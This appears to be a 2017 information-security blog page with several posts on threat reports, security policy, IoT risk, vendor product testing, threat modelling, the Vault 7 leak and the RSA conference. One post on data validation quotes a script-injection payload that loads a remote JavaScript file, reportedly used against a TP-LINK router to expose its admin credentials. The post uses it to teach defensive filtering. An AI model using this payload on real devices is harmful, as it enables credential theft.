IANS Blog

  • Report: Criminals Scale Up Attacks, Ratchet Down Complexity

    by Chris Gonsalves | Apr 26, 2017

    Wednesday, April 26, 2017 By Chris Gonsalves, IANS Director of Technology Research


    The past year proved a bonanza for criminals hell-bent on hacking corporate systems, stealing credentials, pilfering funds and holding data hostage, not to mention influencing the odd presidential election here and there. Along the way, the bad guys have discovered two things: persistence pays and the simplest methods work best.

    Screen Shot 2017-04-26 at 12.59.22 PMThe latest annual Internet Security Threat Report from Symantec, out this week, is a breathless litany of cyber malfeasance highlighting an online security environment stressed by big spikes in phishing attacks, ransomware infections, political chicanery and IoT-based botnet activity.

    The ISTR combines data from Symantec’s 98 million Global Intelligence Network sensors along with analysis of billions of events and documents processed by the vendor’s collection of endpoint protection, anti-spam and managed security services. Among the more chilling findings this year:

    • One in every 131 emails contains a malicious link or attachment, the highest rate of infection seen in more than five years.

    • Ransomware attacks are up 36 percent from last year, and the average ransom demand for compromised data has jumped more than 260 percent, from $294 to $1,077.

    • The United States remains the top ransomware target; small wonder since the majority of Americans (64 percent) pay their attackers to get their data back.

    • The typical company now has nearly 1,000 cloud apps enabled, which comes as a big surprise to CIOs who say they believe the number to be around 40.

    • Zero-days, sophisticated malware and web attack toolkits are falling out of favor with crooks looking for cheaper, easier methods and leveraging spear phishing and freely-available scripting tools like Microsoft PowerShell and Office macros.

    • Hacks for subversive purposes, in particular those during the U.S. election and other global acts of targeted cyber sabotage, are an emerging form of high-profile targeted attack.

    "New sophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus," said Symantec Security Response Director Kevin Haley. "The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cyber criminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services."

    According to Symantec researchers, email is clearly the weapon of choice for today’s attackers. Not only is the percentage of emails with malicious attachments growing, even simpler attacks such as Business Email Compromise (BEC) scams are expanding. Scammers stole more than $3 billion from BEC victims last year and BEC scams now target more than 400 businesses daily.

    symantec chart

    Modern attackers are also travelling light and keeping things simple with a “live off the land” approach that eschews complicated malware and exploit kits in favor of using tools on-hand, such as legitimate network administration software and operating system features. Last year, Symantec researchers noted a marked increase in the use of Microsoft PowerShell and MS Office macros as weapons. Some 95 percent of PowerShell files seen by Symantec in the wild in 2016 were malicious, according to the ISTR.

    Taking advantage of compromised systems increasingly means ransomware, the vendor research found. Not only are ransomware incidents up by more than one-third year over year, but the variety of infections is blossoming as well. Symantec identified over 100 new malware families released into the wild in 2016, more than triple the amount seen previously.

    Not all online criminals are satisfied with the growing take from ransomware, however. Though the Symantec report shows a nearly three-fold increase in ransoms paid for purloined data, a growing number of cyber crooks, particularly those with deep, nation-state pockets, are going after bigger fish.

    Hackers from suspect regimes like North Korea set records last year with highly-organized, multi-million-dollar heists from banks in Bangladesh, Vietnam, Ecuador and Poland.

    "This was an incredibly audacious hack as well as the first time we observed strong indications of nation-state involvement in financial cybercrime," said Haley of the Bangladesh heist.



  • Beaver: Policies Don't Get Hacked, So Why Do They Get All the Attention?

    by Daniel Maloof | Apr 20, 2017

    Thursday, April 20, 2017 By Kevin Beaver, IANS Faculty


    Kevin-Beaver

    What's the first thing everyone seems to talk about when information security is brought up? What about when a new business is starting up, or even when existing organizations are undergoing an audit? The first thing that comes up every time is security policies. Got a risk? There’s a policy for that. Concerned about experiencing a breach? No worries, there’s a policy that covers it.

    There's a policy for acceptable usage and one for data classification. Data backups, patching and system maintenance are often documented in policies as well. Mobile, the cloud, you name it – security policies are everywhere. And they’re creating a serious false sense of security from the smallest startups to the largest enterprises.

    IT people often write these security policies. In fact, IT is where policies often begin and end. Users don’t know about them and management is quick to proclaim that policies are in place to keep things in check. It all looks good on paper. That is, until the first breach occurs.

    If you lived on another planet, were teleported to earth and read about all of the data breaches and security incidents happening around the globe, you would probably wonder what's causing all of this. After all, organizations have security policies that lay out, often in great detail, how things work and how things go down in and around IT. You would expect, given the level of effort that goes into security policy development and oversight, that an organization could not possibly get breached with all of these rules in place.

    Here's the problem: those rules really mean nothing in the grand scheme of things. Sure, auditors love them. Management wants to see them so they can tell their colleagues about them. Policies just make everyone on the perimeter – and outside – of IT feel all warm and fuzzy.

    Turning Words into Action

    At the end of the day, though, words on paper that talk about how things are supposed to work have no real substance and do very little in terms of risk mitigation. There's a big gap between what you say you're doing in security and what's actually being done. And everybody knows where the weaknesses are. There’s just too much bureaucracy, culture and political nonsense getting in the way.

    It’s not the policies that get hacked. Systems do. Applications do. People do. I can’t tell you how many times I have seen businesses with excellent documentation on the administrative/operations side and horrible security vulnerabilities on the technical side. We have to stop spending so much valuable time, money and effort on writing security policies that go nowhere other than the network-share likely to never be seen again.

    Putting on my expert witness hat, I’ve seen time and again where security policies create more problems than they solve. Many organizations are saying they do X, Y and Z, but they're often doing quite the opposite. And guess what? Lawyers and their litigation support team are calling these organizations out on it. Is this the way you want to run your security program? I know it's not, but still, you've got to figure out what you're going to do to bridge the gap between your wayward documentation and reality.

    It can get disheartening if you let it, but I like to focus on all of the opportunities that are out there for us. There’s always an upside, especially when you focus on what matters.

    As security professionals, we need to stop relying on words and let our actions do the talking. Technical controls have to be in place in order for policies to be enforced in most situations. Where that’s not possible or feasible, do something else – whatever it takes. There’s always more. Doing nothing is the easy way out and it’s the fast path to bigger security challenges. We, as information security leaders in our organizations, have to decide how it's going to be.

    Are we going to let lackadaisical, documentation-centric expectations from auditors, regulators and executives drive our security program, or are we going to spend more time on what’s fruitful and build true substance into our programs? We're going to have to address this at some point, so why not start now before someone – one of our own users, a contractor or external attacker – makes us look bad?

     

    ***

    Kevin Beaver, CISSP is an independent information security consultant, writer, professional speaker, and expert witness with Atlanta, Georgia-based Principle Logic, LLC. Kevin has written/co-written 12 books on information security including the best-selling Hacking For Dummies (currently in its 5th edition).

  • Podcast: George Gerchow on CASBs, Cloud Services Providers and the Reality of Security as Code

    by Chris Gonsalves | Apr 14, 2017

    Friday, April 14, 2017 |  By Chris Gonsalves, IANS Director of Technology Research


    20170412_095615 (1)
    The IANS Podcast hits the road this week, meeting up with cloud expert and presentation powerhouse George Gerchow at our Washington DC Forum for a wide-ranging discussion of all things enterprise cloud security. George shares insights into the white-hot Cloud Access Security Broker (CASB) market, and dishes on behind-the-curtain action at the Big 3 cloud providers.

    George dives into SecDevOps, and talks about the need for coding savvy for infosec leaders in the new "security-as-code" world. He also shares how his other life pursuit as an accomplished musician informs his work as an information security thought leader.



    Make sure to subscribe to the IANS Podcast on iTunes or on Google Play.


  • Van Wyk: Get a Handle on Your Data

    by Daniel Maloof | Apr 13, 2017

    Tuesday, April 13, 2017 By Ken Van Wyk, IANS Faculty


    Ken van Wyk

    “Imagine dropping a squirrel into the middle of a golden retriever conference.”

    That's a pretty simple sentence, right? In a word processor, it’s just English text data. But when you mix in human imagination, it becomes something far more dynamic (either that, or you need an imagination upgrade).

    So, why was anyone surprised when it was announced that a TP-LINK router contained a vulnerability that could be exploited by sending it an SMS text containing “<script src=//n.ms/a.js></script>?”

    Remember, one person’s data is another person’s active content.

    Sure, that JavaScript shouldn’t have given the attacker a copy of the router’s admin username and password, but it does (reportedly, anyway – I haven’t verified it, but for the purpose of this discussion, let's assume it to be accurate). After all, SMS should simply consist of a phone number and 160 characters of static alphanumeric text data.

    Just data, right?

    I always tell the software developers I work with that it is absolutely vital they know their data, inside and out. Bear in mind, too, that data is transient. It can be static text in one context and something altogether different in another – much like the squirrel example above. The important thing is that the software team knows the data in its software, as well as how it is transported and consumed in every context.

    The rule of thumb is that data should be validated on the input side to ensure it conforms to what the recipient is expecting, and it should be filtered on the output side to ensure it cannot cause any harm where it is being consumed.

    In other words, that “<script src=//n.ms/a.js></script>” should have been filtered out by whatever component was sending untrusted data (it came from the user, after all) into an HTML interpreting environment. At a bare minimum, the “<“ should become “&lt,” and so on. In practice, it’s more complicated, because you also have to anticipate malicious input data that is encoded using one of a variety of encoding schemes. Nonetheless, the untrusted data should have been prevented from causing harm downstream where it was consumed.

    But, it wasn’t.

    At the downstream end, the HTML interpreting engine would have no way of knowing if the data was intentional or not, so of course it was going to run the script. Mind you, the mere presence of a script like “a.js” that returns the administrative username and password should also be viewed as a lapse in judgment on someone’s part. Build it and they will come — or, in this case, build it and someone will run it.

    Getting to the Root of the Problem

    So ultimately, there’s culpability to go around in this case. But the main point I want to make is that you need to know your data. Know what should be there and block all else. Prevent untrusted data from causing harm downstream. “Defang” the data before handing it to someone else. Failing to do these things will lead to bad results every time.

    This shouldn’t even be a new lesson to us. Remember buffer overflows? It’s actually a very similar problem. Shove a bunch of machine code into a data stack, including enough data to overwrite the instruction pointer (data) so that it will end up pointing to the memory address of the machine code. And voilà: Your machine code data becomes executing machine code – machine code that was passed to the victim by way of a “data” channel (yes, there are many protections against these things in modern CPU architectures, but that’s beside the point).

    Clearly, this whole intermingling of data and executable content – or “active content” as it’s often called in web application environments – isn’t a problem we’ve solved yet. We’ve applied a bit of duct tape and bubble gum here and there, but the problem persists.

    I recently overheard a colleague discussing highly secure web browser environments, who said “you absolutely have to block active content.” Of course, this doesn't make much sense because what's active in one context is passive in another. So whenever I hear those words, I just chuckle to myself and think, "Go jump in a lake." 

     

    ***

    Ken Van Wyk is president and principal consultant at KRvW Associates and an internationally recognized information security expert, author and speaker. He’s been an infosec practitioner in commercial, academic, and military organizations and was one of the founders of the Computer Emergency Response Team (CERT) at Carnegie Mellon University.

  • Poulin: How Consumer-Grade IoT Could Threaten Your Enterprise

    by Daniel Maloof | Mar 31, 2017

    Friday, March 31, 2017 By Chris Poulin, IANS Faculty


    IANS Faculty Chris PoulinIt’s been a rough few weeks for consumer IoT devices. First, WikiLeaks alleges the CIA created a tool that can make it look like your smart television is off, but in reality is still powered, listening to your conversations and possibly even recording video of you surreptitiously. Then, a researcher finds a directory traversal vulnerability in a dishwasher that can be exploited to expose the password file on the connected device.

    Up to this point, the prevailing wisdom has typically been, “who cares about vulnerabilities in home devices? They don't affect the enterprise.” Lately, however, that’s proving to be a critical miscalculation.

    The Mirai botnet demonstrated to us all that home devices can be used to DDoS enterprises – and not just run-of-the-mill companies, but large infrastructure providers – with the ultimate goal of taking down big sites like Amazon, Twitter, Box, PayPal, Netflix, Slack and Airbnb. In addition, some devices double as home consumer appliances and industrial implements. The vulnerable dishwasher, for instance, is a “washer-disinfector” used in hospital and medical facilities, as well as homes. You could – very persuasively – argue that a device that exposes a basic directory traversal wasn’t built with industrial-grade security design and testing.

    And when we look ahead, on the horizon at the enterprise-level are voice-activated assistants, such as the Amazon Echo and Google Home. At least one IANS client I’ve spoken to is considering deploying these devices in an enterprise setting to not only service customer requests, but also for use as an internal assistant: “Alexa, send last month’s P&L report to the finance printer.” The appeal is undeniable, if not the business case.

    Grasping the Important Questions

    As you might expect, however, there are a host of security-related questions, including:

    • Does the system expose a large attack surface or vulnerable services? At the very least, organizations need to perform vulnerability scans upon installation and after every update. Regular vulnerability scans should target voice assistants and other IoT devices, as well as traditional IT systems.

    • Does the system communicate to the back end securely? Organizations should sniff traffic to ensure data is protected and to profile what normal communications look like. If possible, get in the middle of the communications and see what data is transmitted. Test the mobile app to see if it’s easy to break into the account that manages the device and associated data.

    • What does the system record? This is the main privacy concern: is Echo or Home listening in on all conversations and sending all the data back to Amazon and Google? Even if there’s no insidious “Record Everything” mandate, voice assistants may be performing pre-queries on potential questions even before you trigger them with “Alexa” or “Ok Google” so they can respond faster. Also, if you press the “Mute” button, does it physically disconnect the microphone(s) or do you have to trust the software? Someone needs take a few of these devices apart.

    • You can view “History” in the Echo, but how do you know if that’s the entirety of it or just a filtered list? How long is the data retained, whether it’s just the specific requests or ambient conversation? Can you ask the device to read off the history, and if so, would anyone do that? “Alexa, what are the most recent questions I asked you?”

    • How are updates applied, how often do they occur and can you control them? It’s fine for updates to be applied automatically and invisibly to consumer devices, but when it comes to business systems, administrators need to be able to test them on staged equipment before rolling out updates to operational systems. Also, how can administrators be alerted when an update has been applied so that they can run a scan?

    • Can you collect logs and events from the device, into a SIEM, for example? Does it have the capability to generate syslog messages or is there a RESTful API to query? If you can collect data, what events are available? How granular is the data? What commands can you send it (e.g., shut down, clear history, etc.)?

    On top of these questions, while you are able to set up multiple users on an Echo, you’re really only setting up different profiles related to things like music, books and other content. This allows you to share playlists and collaborate on to-do or shopping lists. To switch profiles, you simply ask Alexa to do so; there’s no authentication currently. These devices don’t conform to the tenet of not sharing accounts, an obvious staple of enterprise security policies.They also don't currently support roles. 

    The upshot of all this is that smart home devices are coming to an enterprise near you. Expect connected light bulbs to light up your cubicle – or the operating room where you’re undergoing surgery (yikes). We already have telesurgery robots, so it won’t be long before someone gets the bright idea to connect them to a voice assistant. “Alexa, cut out Chris’ appendix." Will you be ready?

    ***

    Chris Poulin is Director of IoT Security and Threat Intel for Booz-Allen Hamilton's Strategic Initiatives Group, where he is responsible for building countermeasures for threats to the Internet of Things. He has a particular focus on connected vehicles, as well as researching and analyzing security trends in cybercrime, cyber warfare, corporate espionage, hacktivism, and emerging threats.

  • Podcast: Raffy Marty on the Truth About Machine Learning, AI and Advanced Analytics in Infosec

    by Chris Gonsalves | Mar 30, 2017

    Thursday, March 30, 2017 | By Chris Gonsalves, IANS Director of Technology Research


    This week, IANS Faculty Raffy Marty stops by to dish on the buzz -- and the hype -- surrounding machine learning and artificial intelligence in security. The VP of all things analytics at Sophos also talks improvements in visualization, trends in endpoint protection, and the need for better asset inventories and data classification in today's enterprises.

  • Beaver: Taking Responsibility for Vendor Product Security

    by Daniel Maloof | Mar 20, 2017

    Monday, March 20, 2017 By Kevin Beaver, IANS Faculty


    Kevin-Beaver

    When I perform independent information-security assessments, I often assess the security of product vendors' systems and software. Some of these products are related to IT and security, while others fall into the Internet-of-Things (IoT) category. Sometimes it's the vendor looking for an independent review and other times it’s the end user.

    Regardless, the overall goals are always the same: to determine how resilient the system or software is to security attacks, how it meets commonly expected security practices, and how it processes, stores and otherwise handles sensitive information.

    When I'm seeking out security flaws in these products – be it web browser plug-ins, mobile app environments or network-connected hardware devices – the outcomes are predictable. If the system has an IP address, a URL or a mere software surface that can be interacted with, anything is fair game for attack and exploit. All that is typically required is a web browser, command prompt and network analyzer combined with a malicious mindset and knowledge of what to look for. Network and web vulnerability scanners often uncover even more issues. Some common flaws that I have found in these products include:

    • Severely outdated operating system and application patches

    • Users running with administrator or root privileges and no reasonable means of protecting against malware

    • Documented and undocumented backdoor accounts – for some of which the credentials are a simple Google search away

    • Ancillary services and features enabled by default, such as USB ports, as well as FTP and web interfaces that create unnecessary exposures

    • Cross-site scripting and SQL injection flaws

    • Sloppy storage of sensitive user and system configuration information

    • Unencrypted network communications that expose login credentials and connection details of the endpoint systems involved

    • Software installations that reconfigure system settings and create exposures for both endpoints and administrative systems

    Every manufacturer out there has a gadget or application that can easily end up creating security risks in the enterprise. Be careful. Just because a vendor makes and sells these products, it doesn't mean they have security-savvy software developers or even someone validating that security is in check. Ironically, IT- and security-related products tend to be the worst offenders.

    It’s clear to me that many product vendors are not thinking about how their systems can be attacked and what those exposures can lead to. I also think this underscores the criticality of IoT and product-centric security and how they impact both businesses and consumers alike.

    Doing Our Part

    Is more regulation needed? That's an entirely different discussion, but generally speaking, I don't think so because we've seen the comical outcomes of regulations such as HIPAA and the CAN-SPAM Act. If anything, regulating product security gives businesses and consumers something to fall back on when the products lead to security attacks.

    In the same way we can't rely on the police to keep us safe all the time or doctors to ensure that we always take the proper steps to live long and healthy lives, we all have a responsibility to keep things safe and secure in the systems and software we use. Maybe that means holding these vendors more accountable when security flaws are found. Maybe it means adding your own compensating controls when using their products on your network. Or, perhaps it means letting the market work things out by looking elsewhere and not supporting vendors that have subpar security.

    It's ultimately up to you. At the end of the day, you can't blame poor security and the subsequent incidents and breaches on someone else. Rather than more finger-pointing, regulation and red tape, let's have the discipline to do what's right and take the proper steps to reasonably lock things down – even if it's someone else's product.

    If you suspect a third-party product is exposing your network or creating other unnecessary risks, don't be afraid to test the system yourself if it's in your own environment. Or, ask for (or hire someone to do) an independent assessment. Ask your vendors the tough questions about what they're doing to test and resolve the issues that are uncovered. Hold their feet to the fire. In the worst-case scenario, if an incident or breach does occur, you'll have a paper trail showing that you were taking reasonable steps and doing your own due diligence to keep things in check.

     

    ***

    Kevin Beaver, CISSP is an independent information security consultant, writer, professional speaker, and expert witness with Atlanta, Georgia-based Principle Logic, LLC. Kevin has written/co-written 12 books on information security including the best-selling Hacking For Dummies (currently in its 5th edition).

  • Van Wyk: Building Your Threat Modeling Process

    by Daniel Maloof | Mar 14, 2017

    Tuesday, March 14, 2017 By Ken Van Wyk, IANS Faculty


    Ken van WykIt’s not often that a new “cool” thing comes along in information security and we’re able to say we’re already doing it. But that’s the case with threat modeling – well, at least in part. You are doing threat modeling, right? If your answer is “no,” perhaps you just know it by a different name. Maybe you call it a design/architecture review, or something completely different.

    Well, whatever you call it, let’s take a look at threat modeling and why it’s so important for infosec teams.

    Threat modeling is the process of critically reviewing a system’s design for potential security defects – plain and simple. There are a few industry processes that allow us to follow a rigorous methodology, including Microsoft’s STRIDE and DREAD, as well as Synopsys’ (formerly Cigital’s) Architectural Risk Analysis (ARA).

    Or, as fellow IANS Faculty Adam Shostack describes in his excellent book, “Threat Modeling: Designing for Security,” we can follow a more simple and intuitive approach and still get good results.

    But, why bother? Aren’t we already doing static code analysis and rigorous security testing? Shouldn’t those processes find any security mistakes we’ve made in our software? Well, partially. It’s a question of perspective.

    Static code analysis can be effective at finding implementation bugs such as failing to adequately filter data input, which can result in various cross-site scripting (XSS) and related data injection attacks. Its shortcoming, though, is that it fails to see business-relevant architectural flaws, such as relying on client code (e.g., JavaScript or Objective-C) to make security decisions. If we do our threat modeling well, we can find those sort of design failures before they cause us real grief later. Design failures, after all, can be among the most difficult and costly problems to fix.

    Threat Modeling in Practice

    So how, exactly, do we do this threat modeling thing and in what ways might we already be doing it?

    Basically, it involves four steps:

    1. Model it
    2. Find threats
    3. Address threats
    4. Validate threats

    Easy peasy, right? Well, let’s dive into each of those steps a bit and see for ourselves.

    Model It

    This is where we describe our system. One of the best things about threat modeling is that it allows us to take either a big- or small-picture view of our systems, but we must be able to clearly describe our design. This can take the form of a component diagram – either physical or logical – or things like data-flow diagrams. Be sure to clearly describe the component interconnections within your application. These inputs make up what we call the “attack surface” of the application (or the portion of the application we’re presently considering).

    Find Threats

    So, taken by itself, this piece seems a bit like “… and then a miracle occurs,” right? But there’s obviously a lot more to this, and there are a few things that can make this step go a bit more smoothly.

    For starters, zoom in on one component at a time. Also, make sure to critically consider who has access to each component, including those who are authorized and unauthorized. Then, consider what would motivate the bad guys to attack. What is their goal? What are their expected technical capabilities? Can they, for example, write serious malware that can withstand reverse engineering for a considerable amount of time? In other words, make your threat scenarios real.

    It’s also important to include key personnel such as your incident response operations team, your threat intelligence people, your principal design team and the business owners of the application being reviewed. Encourage the team to brainstorm and record everything they come up with.

    This is also where Microsoft’s STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial-of-Service, Elevation of Privilege) model can be helpful. Use it as a checklist to catalyze conversations about individual scenarios.

    Address Threats

    This is where you decide what, if anything, you’re going to do about each threat you’ve uncovered. Start by prioritizing them. Microsoft’s DREAD (Damage, Reproducibility, Exploitability, Affected Users, Discoverability) methodology can be helpful here. Use it to prioritize your threat list. Some companies prefer a quantified approach here, but I’ve found that the threat model team can do this step pretty intuitively using simple levels of quantification like low, medium and high priority. Of course, don’t neglect to factor in the costs of each potential remediation.

    Validate Threats

    Finally, it’s a good idea to prove that the threats and their remediations are based on facts and not just “gut feel.” Make sure each threat scenario is something your attackers can actually achieve, and that each remediation will truly protect your business.

    Knowing Where to Begin

    So, perhaps you never called this threat modeling, but I’ll bet you were already reviewing your business applications at some level prior to rolling them out. Maybe your process is too simplistic, though. Perhaps a more rigorous threat modeling process like the one I’ve outlined here can be helpful.

    Either way, I say give it a try. Threat model a small application first and see how the process works for you. You may need to tweak it a few times before you get it right, and that’s all good. In Adam Shostack’s book, he encourages us in Chapter 1 to do a simple threat model first, before even getting into processes like the one I’ve described above. That’s great too!

    Ultimately, in my experience with threat modeling, the two most important ingredients for success are a talented and willing multi-disciplinary team and a huge white board. Sure, the former might be a bit tougher to come by, but don’t even think about underestimating that white board! 

     

    ***

    Ken Van Wyk is president and principal consultant at KRvW Associates and an internationally recognized information security expert, author and speaker. He’s been an infosec practitioner in commercial, academic, and military organizations and was one of the founders of the Computer Emergency Response Team (CERT) at Carnegie Mellon University.



  • Vault 7: WikiLeaks Dumps Massive Trove of Alleged CIA Hacking Tools

    by Chris Gonsalves | Mar 07, 2017

    Tuesday, March 7, 2017 By Chris Gonsalves, IANS Director of Technology Research


    Information security professionals on Tuesday were scrambling to make sense of a sizable dump of alleged CIA surveillance tools and techniques that appears to detail methods for hacking into networks, computers, smartphones and internet-connected consumer devices such as smart TVs.

    Notorious document leakers WikiLeaks released the trove of nearly 8,000 pages and 1,000 attachments, which includes supposed details of the CIA’s hacking arsenal such as malware, viruses, trojans, weaponized zero-day exploits and malware remote control systems. WikiLeaks officials said the Tuesday document dump, dubbed Vault 7, constitutes “the largest ever publication of confidential documents on the agency” and is just the first part of what it promises will be an ongoing release with “several hundred million lines of code” comprising “the entire hacking capacity of the CIA.”

    While security industry insiders work to verify the authenticity -- and relative importance -- of the documents and the code in the release, the claims raising the most concern include details of the CIA’s ability to work around encryption efforts in popular mobile messaging apps by capturing message data in compromised endpoints prior to encryption. The Vault 7 release indicates robust and focused efforts by the CIA to develop and hoard exploits targeting Apple's iPhone, Google's Android and Microsoft’s Windows operating systems.

    Perhaps most damaging, the release, which includes verifiable CIA code names and organization charts, exposes CIA playbooks showing how the agency conducts operations, evades detection and deploys malware.

    According to a statement from WikiLeaks accompanying the Vault 7 dump, the CIA over the past seven years has been developing an elite hacking division to compete with its main cyber-intelligence rival, the NSA. By last year, the CIA hacking unit, which falls under the Center for Cyber Intelligence, had more than 5,000 registered users and “had produced more than a thousand hacking systems, trojans, viruses and other weaponized malware.”

    The collection of CIA hacking tools and techniques, many of which appear fairly routine on first inspection, “appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive,” WikiLeaks officials said. Dates on the released documents range from 2013 to 2016.

    If ultimately proven authentic, the Vault 7 document collection will also be notable for revealing:

    • In addition to its operations in Langley, Va., the CIA also uses the U.S. consulate in Frankfurt, Germany, as a covert base for hackers working in Europe, the Middle East and Africa.

    • The CIA's arsenal includes numerous local and remote zero days obtained from GCHQ, NSA, FBI or purchased from cyber arms contractors such as Baitshop.Dave-Kennedy

    • CIA hackers have developed successful attacks against most well known anti-virus programs and have targeted anti-exploitation defenses such as EMET. 

    “Honestly, this pretty much kills large aspects of the United States offensive capabilities, techniques, and ability to perform operations,” noted security expert and IANS Faculty Dave Kennedy said on Twitter in the wake of the Vault 7 release.

    “While I agree on having debate on what the government should be able to do and oversight in that, this is something different,” Kennedy said. “To me, this seems extremely aggressive for WikiLeaks, more than I’ve ever seen. This really hurts operations abroad for true hostiles.

    "Truth of the matter is if I was an adversary against the United States, this is exactly what I would do…Burn capabilities globally,” added Kennedy.

  • Poulin: Breaking Down RSA and the Past, Present and Future of Information Security

    by Daniel Maloof | Mar 06, 2017

    Monday, March 6, 2017 By Chris Poulin, IANS Faculty


    IANS Faculty Chris PoulinWhether you look forward to or dread the RSA conference each year, it's practically a must-attend event for everyone who’s anyone in information security.

    I’ll admit I’m a fickle attendee: I make my way across the U.S. about once every five years to check out the happenings, then disappointment sets in for a few years before time erases the memory and I start the cycle all over again. This year was a reset year and did not fail to disappoint in confirming my general cynicism.

    Well, that’s not totally fair. There are definitely a few big reasons to go to the conference, and painting the entire experience with a sarcastic broad brush is unfair. These include, as you might expect:

    • Training and presentations: These can be hit or miss, but there are always some that give good background on a variety of topics, like IPv6 security. Still, as I get older and more impatient, I think I'd rather digest even the well-crafted talks in whitepaper form where I can control the pace.

    • Meetings with clients, prospects, partners and analysts: At this point in my career, these meetings in hotel suites and coffee shops around the Moscone Center offer me the most value. 

    • Networking with peers: This is related to the above, but it's about growing your network. This is another big reason I still attend RSA. 

    These factors alone can make attending RSA worthwhile, but then, of course, there's also the expo floor. I have a lot of thoughts on the expo floor at RSA, but to sum it up, I would say this: There are way too many vendors to digest in five days, so the best you can hope for is to get a general sense of the landscape and have a half-dozen meaningful conversations.

    Ultimately, I came away feeling a bit like Scrooge in “A Christmas Carol," but nonetheless, here are my three major takeaways from RSA Conference 2017:

    • The ghost of security past: Mobile security turned out to not be a thing after all. The days of vendors that only focused on mobile security are gone. The major players have been sucked into the gravity of larger institutional planets. Mobile security is now table stakes and relegated to MDM/MAM functions, with containerization, approved app stores and self-service installation. We’ve hit the wall with mobile security hype, and as I’ve predicted many times in the past, there have been no major mobile security breaches that have compromised enterprise data. Maybe that’s a result of early fear and rapid introduction of security tools; maybe the big one just hasn’t hit yet. In any case, there’s nothing to see here, people, move on.

    • The ghost of security present: Threat intelligence and analytics are still being talked about a ton. Everyone is trying to figure out a meaningful use for all that data we’ve been collecting over the last 20 years. Some of it comes from external sources, others from inside the enterprise. Vendors are sucking in data from thousands of paste sites, underground forums and the deep and dark webs. They’re scraping sites and looking for bad signs of compromise or illicit content with which to rate the badness, and they’re watching internet traffic to profile phishing email and spam. For data from inside the organization, the mantra seems to be, “The SIEM is dead; long live the next-generation SIEM!”

    • The ghost of security future: Hunting and deception are starting to capture the interest of more progressive organizations. The trick to hunting is getting the right information at the right time - a balancing act between storing every bit in case it’s needed later - and identifying potential attacks in progress to take a snapshot in time. The former requires insane amounts of storage, while the latter requires triggers that need to be tuned to reduce false positives and eliminate false negatives. We’ve seen this before with tools like NetWitness (now owned, appropriately, by RSA) and…well, SIEMs. Deception is interesting in that it provides an early warning when attackers start rattling doorknobs during internal surveillance and lateral movement. Some can even work with IoT devices, such as industrial control and medical equipment.

    Of course, there are also the usual suspects, who’ve been around for years. Think AV, firewalls, and all that “defense-in-depth” stuff. They’re trying to reinvent themselves in light of new trends, but they’re also still stuck in the past with the old chestnuts. The whole experience felt a little like a traveling medicine show on steroids. For all of you millennials out there, you’ll have to Google that reference. Look up snake oil while you’re at it.

    So, finally, after a week of confusing my fitness wearable by clocking more than 15,000 steps per day (where presumably some machine learning algorithm is figuring out my exact date and time of demise), I’m left with the impression that we’re making progress in information security, despite my cantankerous nature.

    However, the positives are hidden in the white noise of marketing. It’s like finding the actual image in those Magic Eye pictures from the 1990s. What I see when I defocus my eyes and stare at the landscape is that we’ve moved from a purely defensive posture to detection, and now we’re starting to employ offensive tactics. Hunting and deception give us the ability to put attackers on the defense as long as they’re on our own turf. I’ll really be impressed, though, when predictive analytics actually predict a future attack. So, for that, I guess I’ll see you at RSA in another five years.

    ***

    Chris Poulin is Director of IoT Security and Threat Intel for Booz-Allen Hamilton's Strategic Initiatives Group, where he is responsible for building countermeasures for threats to the Internet of Things. He has a particular focus on connected vehicles, as well as researching and analyzing security trends in cybercrime, cyber warfare, corporate espionage, hacktivism, and emerging threats.

Sign up for Updates


We’ll send you short and sweet notifications about our content and events.